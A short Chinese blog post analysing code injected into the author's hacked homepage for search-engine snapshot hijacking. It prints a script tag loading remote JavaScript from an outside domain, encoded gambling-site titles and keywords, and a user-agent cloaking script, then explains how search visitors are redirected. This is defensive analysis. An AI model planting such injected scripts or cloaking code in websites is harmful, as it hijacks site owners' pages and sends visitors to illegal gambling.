分享一次 百度快照劫持代码

休闲思考
2 1951

<script language="javascript" type="text/javascript" src="http://mhhb.net/include/7039j.js" ></script> 
&#33150;&#35759;&#20998;&#20998;&#24425;&#23448;&#32593;&#95;&#33150;&#35759;&#20998;&#20998;&#24425;&#27880;&#20876;&#95;&#33150;&#35759;&#20998;&#20998;&#24425;&#24179;&#21488;</title>
<meta name="keywords" content="腾讯分分彩官网,腾讯分分彩注册,腾讯分分彩平台"/>
<meta name="description" content="腾讯分分彩【唯一官网平台开奖直播7039j.com】时时精准提供腾讯分分彩开奖结果,腾讯分分彩历史记录,腾讯分分彩技巧和玩法,腾讯分分彩全天人工计划!
"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="计科之路"}</script>

这是一次新的体验。网站应该还有很多漏洞之处。在这写下这些代码,供大家参考分析。

一个首页,仅只有一个html文件 , 不知道从哪 个后门增加了这种情况。


【1】if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示网站本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。

【2】

这个是Unicode编码转换   http://tool.chinaz.com/tools/unicode.aspx     中文如下:

腾讯分分彩官网,腾讯分分彩注册,腾讯分分彩平台

【3】<meta name="description" content="

腾讯分分彩【唯一官网平台开奖直播7039j.com】时时精准提供腾讯分分彩开奖结果,腾讯分分彩历史记录,腾讯分分彩技巧和玩法,腾讯分分彩全天人工计划!

说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址,而短网址解密出来:
就是这个BC网站,这些黑客真是煞费苦心。